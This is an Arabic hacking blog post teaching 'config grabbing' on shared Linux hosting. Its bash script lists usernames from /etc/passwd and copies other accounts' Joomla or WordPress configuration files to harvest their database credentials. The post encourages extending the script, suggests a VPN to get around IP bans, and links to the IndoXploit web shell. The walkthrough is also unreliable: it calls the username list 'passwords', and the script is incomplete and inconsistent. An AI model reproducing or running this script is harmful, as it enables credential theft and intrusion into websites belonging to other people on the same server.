16922060824144624
أخبار ساخنة

شرح سحب الكونفيق من السيرفر و اختراق المواقع التي على السيرفر

الخط




السلام عليكم و رحمة الله و بركاته


موضوعنا اليوم غريب قليلا و لكن ساعطي مفهوم او كيف تتم عملية سحب الكونفيق من السيرفر
للاسف الشديد نرى الكثير من الاطفال يقوم ب تحميل سكربت سحب الكونفيق و ادا لم ينجح معه الامر  يروح يحمل غيره و هو لا يعرف حتى كيف تتم عملية سحب الكونفيق
لهادا انا هنا اليوم
سوف نقوم ب الشرح ب الطريقة العملية لكي يفهم الجميع
جميل جدا
هادا سكربت بسيط جدا ب لغة الباش لسحب الكونفيق


#!/bin/bash

awk -F':' '{ print $1 }' /etc/passwd  > passwd.txt
passwd=`cat passwd.txt`
mkdir sym_confog
pwd=`pwd`
wait
for i in $passwd
do

cp /home/$i/public_html/configuration.*  $pwd/sym_confog/$i.txt




دعونا نقوم ب شرح طبيعة عمل السكربت لازم ترجع الى اسسيات الباش لكي تفهم
او تقوم ب كتابة السكربت ب لغة البرمجة التي تعرفها
جميل جدا

awk -F':' '{ print $1 }' /etc/passwd > passwd.txt
1 امر سحب الباصوردات من السيرفر و و ضعها في ملف اسمه passwd.txt
passwd=`cat passwd.txt`

2 متغير اسمه passwd يحمل في داخله قيمة هده القيمة عبارة عن passwd الموجودة في السيرفر نفسه و التي سحبناها

mkdir sym_config

3 انشاء ملف اسمه sym_config طبعا لو تلاحضو السكرت موجه الى سيرفرات لينوكس فقط ف :)


pwd=`pwd`

4 حجز متغير يحمل في داخله امر pwd و هادا الامر وضيفته في اوامر الينكس هو تحديد مسار معين في السيرفر على سبيل المثال

ملف موجود في home/user/Desktop/file
لان نكتب في الترمنا pwd file سوف يطبع لنا home/user/Desktop/
جميل جدا اضن ان الفكرة قد وصلت

wait
for i in $passwd
do

هنا نريد انشاء عملة حسابية في الاسفل فقلنا ادا i in $passwd و الان ننزل الى الاسفل لعمل العملية الحسابية الخاصة بنا و هي سحب الكونفيق

cp /home/$i/public_html/configuration.* $pwd/sym_confog/$i.txt

هنا قلنا cp اي نسخ مسار /home/$i/public_html/configuration.* الى $pwd/sym_confog/$i.txt جميل جدا اليس مفهوم حسننا سادخلها في راسك

$i هو متغير يحمل قيمة و القيمة في حالتنا الان هي اليوزر

configuration.* هادا هو اسم الكونفيق لو كان بدك تسحب ورد برس كل ما عليك فعله هو تغييره ليصبح wp-config.* جميل جدا

pwd/sym_confog/$i.txt$

هنا سوف ينشء ملف اسمه$i.txt يعني اليوزر + اسم ملف الكونفيق و لكن ب سيغة txt

الان خلينا نضيف العديد من الاسماء و المسرات لانه و بطبيعة الحال يوجد الكثير من اليوزرات و الكونفقات في السيرفر
لا تنسى تغيير /home/public_html/ بمسار السيرفر الدي تريد السحب منه غالبايكون home2 home4 او vhost جميل رح اعدل على السكربت

النتيجة النهائية





من الافضل انك تعيد كتابة السكربت بلغة php لانه سوف تحدث معك مشاكل على الاغلب في sh و لكن ادا تم حضر الايبي الخاص بك من السيرفر عند
تجربة السكربت قم فقط ب عمل vpn و ان شاء الله ينفك الحضر
الملخص
انا لم اضف الكثير من المسارات
/home1 و /home/ انت يمكنك اعدة كتابة السكربت و تطويره الى غاية سحب كل الكونفقات من السيرفر
و هناك طرق اخرى ايضا قوية الا و هي عن طريق شل  IndoXploit لان اضافة سحب الكونفيق على هادا الشل اكثر من رائعة و تدعم معضم المسارات و انواع السكربتات المركبة على السيرفر 
رابط تحميل الشل 
http://www.tools-hack.com/2017/05/download-shell-indoxploit.html

الشرح ب الفيديو 


ليست هناك تعليقات
إرسال تعليق

إرسال تعليق

نموذج الاتصال
الاسمبريد إلكترونيرسالة

يا رب تروح للجنة إشترك في قناتي